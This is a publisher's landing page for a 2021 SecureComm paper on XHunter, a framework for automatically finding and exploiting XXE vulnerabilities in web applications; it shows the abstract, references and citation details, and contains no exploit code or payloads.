Abstract
XXE vulnerability is a severe cybersecurity threat. OWASP listed the 10 most serious web application security risks, and XXE ranked fourth. This vulnerability can lead to sensitive information leakage, DoS attacks, and intranet asset discovery. Little attention has been given to this problem, and manual work is still needed to detect these vulnerabilities. Here, we design a penetration test framework, XHunter, to discover and exploit XXE vulnerabilities automatically. XHunter can find the call chain that triggers a vulnerability and determine the vulnerability’s influence scope. Specifically, our work addresses many challenges in the analysis of modern web applications, such as object-oriented structures. In addition to detecting vulnerable sinks, we find the exploit path automatically. We give each vulnerability a risk rating based on the potential impact of the exploits. In this paper, we analyze 22 real-world web frameworks and find 8 unreported vulnerabilities, 2 of which have obtained CVE IDs.
Access this chapter
Tax calculation will be finalised at checkout
Purchases are for personal use only
Similar content being viewed by others
References
Billion laughs attack. https://en.wikipedia.org/wiki/Billion_laughs_attack
Chanzhi eps. https://github.com/goodrain-apps/chanzhieps
Drupal. https://www.drupal.org/
How we got read access on Google’s production servers. https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/
Joomla. https://www.joomla.org/
OWASP top 10 application security risks - 2017. https://owasp.org/wwwprojecttopten/OWASP_Top_Ten_2017/Top_10-2017_Top_10.html
PHP runtime vulnearbility detect. https://github.com/ExploreZone/prvd
Security bulletin: Websphere application server is vulnerable to an information exposure vulnerability. https://www.ibm.com/support/pages/node/6334311. Accessed 24 Sept 2020
XXE in OpenID of Facebook. https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
XXE in WeChat pay SDK. https://seclists.org/fulldisclosure/2018/Jul/3
Alhuzali, A., Eshete, B., Gjomemo, R., Venkatakrishnan, V.: Chainsaw: chained automated workflow-based exploit generation. In: Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security, pp. 641–652 (2016)
Alhuzali, A., Gjomemo, R., Eshete, B., Venkatakrishnan, V.: \(\{\)NAVEX\(\}\): precise and scalable exploit generation for dynamic web applications. In: 27th \(\{\)USENIX\(\}\) Security Symposium (\(\{\)USENIX\(\}\) Security 18), pp. 377–392 (2018)
Balzarotti, D., et al.: Saner: composing static and dynamic analysis to validate sanitization in web applications. In: 2008 IEEE Symposium on Security and Privacy (SP 2008), pp. 387–401. IEEE (2008)
Balzarotti, D., Cova, M., Felmetsger, V.V., Vigna, G.: Multi-module vulnerability analysis of web-based applications. In: Proceedings of the 14th ACM Conference on Computer and Communications Security, pp. 25–35 (2007)
Cova, M., Balzarotti, D., Felmetsger, V., Vigna, G.: Swaddler: an approach for the anomaly-based detection of state violations in web applications. In: Kruegel, C., Lippmann, R., Clark, A. (eds.) RAID 2007. LNCS, vol. 4637, pp. 63–86. Springer, Heidelberg (2007). https://doi.org/10.1007/978-3-540-74320-0_4
Dahse, J., Schwenk, J.: RIPS-A static source code analyser for vulnerabilities in PHP scripts. In: Seminar Work (Seminer Çalismasi). Horst Görtz Institute Ruhr-University Bochum (2010)
Duchene, F., Groz, R., Rawat, S., Richier, J.L.: XSS vulnerability detection using model inference assisted evolutionary fuzzing. In: 2012 IEEE 5th International Conference on Software Testing, Verification and Validation, pp. 815–817. IEEE (2012)
Duchene, F., Rawat, S., Richier, J.L., Groz, R.: Kameleonfuzz: evolutionary fuzzing for black-box XSS detection. In: Proceedings of the 4th ACM conference on Data and Application Security and Privacy, pp. 37–48 (2014)
Jovanovic, N., Kruegel, C., Kirda, E.: Pixy: a static analysis tool for detecting web application vulnerabilities. In: 2006 IEEE Symposium on Security and Privacy, SP 2006, pp. 258–263 (2006)
Lee, T., Wi, S., Lee, S., Son, S.: Fuse: finding file upload bugs via penetration testing. In: 2020 Network and Distributed System Security Symposium. Network & Distributed System Security Symposium (2020)
Li, L., Dong, Q., Liu, D., Zhu, L.: The application of fuzzing in web software security vulnerabilities test. In: 2013 International Conference on Information Technology and Applications, pp. 130–133. IEEE (2013)
Luo, Z., Wang, B., Tang, Y., Xie, W.: Semantic-based representation binary clone detection for cross-architectures in the internet of things. Appl. Sci. 9(16), 3283 (2019)
Pellegrino, G., Johns, M., Koch, S., Backes, M., Rossow, C.: Deemon: detecting CSRF with dynamic analysis and property graphs. In: Proceedings of the 2017 ACM SIGSAC Conference on Computer and Communications Security, pp. 1757–1771 (2017)
Son, S., Shmatikov, V.: Saferphp: finding semantic vulnerabilities in PHP applications. In: Proceedings of the ACM SIGPLAN 6th Workshop on Programming Languages and Analysis for Security, pp. 1–13 (2011)
Späth, C., Mainka, C., Mladenov, V., Schwenk, J.: Sok:\(\{\)XML\(\}\) parser vulnerabilities. In: 10th \(\{\)USENIX\(\}\) Workshop on Offensive Technologies (\(\{\)WOOT\(\}\) 16) (2016)
Späth, C., Schwenk, J.: Security implications of DTD attacks against a wide range of XML parsers. Master, Ruhr-University Bochum (2015)
Steuck, G.: XXE (XML external entity) attack. OWASP (October 2002)
Morgan, T.D., Ibrahim, O.A.: XML schema, DTD, and entity attacks. http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf. Accessed 19 May 2014
Yunusov, T., Osipov, A.: XML out-of-band data retrieval. In: BlackHat EU 2013 (2013)
Wang, E., Wang, B., Xie, W., Wang, Z., Luo, Z., Yue, T.: EWVHunter: grey-box fuzzing with knowledge guide on embedded web front-ends. Appl. Sci. 10(11), 4015 (2020)
Xie, Y., Aiken, A.: Static detection of security vulnerabilities in scripting languages. In: USENIX Security Symposium, vol. 15, pp. 179–192 (2006)
Acknowledgements
We would like to thank the anonymous reviewers for their valuable comments and helpful suggestions.
Author information
Authors and Affiliations
Corresponding author
Editor information
Editors and Affiliations
Rights and permissions
Copyright information
© 2021 ICST Institute for Computer Sciences, Social Informatics and Telecommunications Engineering
About this paper
Cite this paper
Wang, Z., Xie, W., Tao, J., Tang, Y., Wang, E. (2021). XHunter: Understanding XXE Vulnerability via Automatic Analysis. In: Garcia-Alfaro, J., Li, S., Poovendran, R., Debar, H., Yung, M. (eds) Security and Privacy in Communication Networks. SecureComm 2021. Lecture Notes of the Institute for Computer Sciences, Social Informatics and Telecommunications Engineering, vol 399. Springer, Cham. https://doi.org/10.1007/978-3-030-90022-9_2
Download citation
DOI: https://doi.org/10.1007/978-3-030-90022-9_2
Published:
Publisher Name: Springer, Cham
Print ISBN: 978-3-030-90021-2
Online ISBN: 978-3-030-90022-9
eBook Packages: Computer ScienceComputer Science (R0)